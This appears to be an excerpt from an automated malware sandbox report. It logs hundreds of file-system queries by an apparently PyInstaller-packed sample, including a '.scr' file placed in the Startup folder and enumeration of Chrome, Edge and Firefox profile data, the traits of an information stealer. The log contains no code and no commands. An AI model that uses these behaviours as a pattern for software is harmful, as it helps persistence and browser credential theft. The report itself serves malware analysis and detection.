              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe  Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
